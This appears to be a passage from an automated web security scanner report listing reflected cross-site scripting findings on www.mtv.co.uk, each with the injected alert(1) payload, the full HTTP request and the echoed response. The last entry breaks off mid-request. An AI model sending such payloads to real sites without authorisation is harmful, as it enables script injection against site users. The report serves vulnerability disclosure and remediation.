<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
om.mtvi.reporting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sitesdd3bd"-alert(1)-"d480e12847b/all/modules/gsa/opensearch.xml");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttri
...[SNIP]...

2.104. http://www.mtv.co.uk/sites/all/modules/gsa/opensearch.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/gsa/opensearch.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88542"-alert(1)-"d7718f9560d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all88542"-alert(1)-"d7718f9560d/modules/gsa/opensearch.xml HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:59 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13445
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:51:02 GMT
Date: Mon, 12 Sep 2011 12:51:02 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
tvi.reporting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all88542"-alert(1)-"d7718f9560d/modules/gsa/opensearch.xml");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute
...[SNIP]...

2.105. http://www.mtv.co.uk/sites/all/modules/gsa/opensearch.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/gsa/opensearch.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40c5d"-alert(1)-"39abbfac80 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules40c5d"-alert(1)-"39abbfac80/gsa/opensearch.xml HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:51:12 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13439
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:51:13 GMT
Date: Mon, 12 Sep 2011 12:51:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
rting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules40c5d"-alert(1)-"39abbfac80/gsa/opensearch.xml");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10
...[SNIP]...

2.106. http://www.mtv.co.uk/sites/all/modules/gsa/opensearch.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/gsa/opensearch.xml

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7899"-alert(1)-"456b488dfcc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/gsaf7899"-alert(1)-"456b488dfcc/opensearch.xml HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:51:38 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13439
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:51:38 GMT
Date: Mon, 12 Sep 2011 12:51:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
g.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/gsaf7899"-alert(1)-"456b488dfcc/opensearch.xml");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "
...[SNIP]...

2.107. http://www.mtv.co.uk/sites/all/modules/gsa/opensearch.xml [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/gsa/opensearch.xml

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d010"-alert(1)-"bf7411a02bc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/gsa/opensearch.xml9d010"-alert(1)-"bf7411a02bc HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Last-Modified: Mon, 12 Sep 2011 12:51:47 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13439
Vary: Accept-Encoding
Expires: Mon, 12 Sep 2011 12:51:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 12 Sep 2011 12:51:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...

com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/gsa/opensearch.xml9d010"-alert(1)-"bf7411a02bc");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.108. http://www.mtv.co.uk/sites/all/modules/mtv_videobrowse/mtv_videobrowse.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/mtv_videobrowse/mtv_videobrowse.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25ac1"-alert(1)-"0a5748c1d7d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/mtv_videobrowse/25ac1"-alert(1)-"0a5748c1d7d?1274367484 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:05 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13437
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:05 GMT
Date: Mon, 12 Sep 2011 12:50:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
);
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/mtv_videobrowse/25ac1"-alert(1)-"0a5748c1d7d");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.109. http://www.mtv.co.uk/sites/all/modules/nice_menus/nice_menus.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/nice_menus/nice_menus.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d83e"-alert(1)-"d0b389f7668 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/nice_menus/7d83e"-alert(1)-"d0b389f7668?1234890325 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:05 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13431
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:05 GMT
Date: Mon, 12 Sep 2011 12:50:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/nice_menus/7d83e"-alert(1)-"d0b389f7668");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.110. http://www.mtv.co.uk/sites/all/modules/nice_menus/nice_menus_default.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/nice_menus/nice_menus_default.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b42df"-alert(1)-"7b9aaed79b2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/nice_menus/b42df"-alert(1)-"7b9aaed79b2?1309439822 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:01 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13431
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:02 GMT
Date: Mon, 12 Sep 2011 12:50:02 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/nice_menus/b42df"-alert(1)-"7b9aaed79b2");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.111. http://www.mtv.co.uk/sites/all/modules/top_tabs/top_tabs.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/top_tabs/top_tabs.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98e58"-alert(1)-"5d8b7fc99da was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/top_tabs/98e58"-alert(1)-"5d8b7fc99da?1244458641 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:07 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13421
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:07 GMT
Date: Mon, 12 Sep 2011 12:50:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
atcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/top_tabs/98e58"-alert(1)-"5d8b7fc99da");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.112. http://www.mtv.co.uk/sites/all/modules/user_optin/user_optin.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/user_optin/user_optin.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dbf9"-alert(1)-"7de6b6466d6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/user_optin/9dbf9"-alert(1)-"7de6b6466d6?1241187880 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:05 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13427
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:05 GMT
Date: Mon, 12 Sep 2011 12:50:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/user_optin/9dbf9"-alert(1)-"7de6b6466d6");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.113. http://www.mtv.co.uk/sites/all/themes/mtvuk/blueprint/blueprint/print.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/blueprint/blueprint/print.css

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b08dd"-alert(1)-"477bf834596 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/blueprint/blueprint/b08dd"-alert(1)-"477bf834596?1234890284 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:07 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13455
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:07 GMT
Date: Mon, 12 Sep 2011 12:50:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
m.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/blueprint/blueprint/b08dd"-alert(1)-"477bf834596");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.114. http://www.mtv.co.uk/sites/all/themes/mtvuk/blueprint/blueprint/screen.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/blueprint/blueprint/screen.css

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13e42"-alert(1)-"a0ad2d31b48 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/blueprint/blueprint/13e42"-alert(1)-"a0ad2d31b48?1235581642 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:49:57 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13459
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:49:58 GMT
Date: Mon, 12 Sep 2011 12:49:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
m.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/blueprint/blueprint/13e42"-alert(1)-"a0ad2d31b48");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.115. http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b14d0"-alert(1)-"2105664c6ae was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/flash/b14d0"-alert(1)-"2105664c6ae HTTP/1.1
Host: www.mtv.co.uk
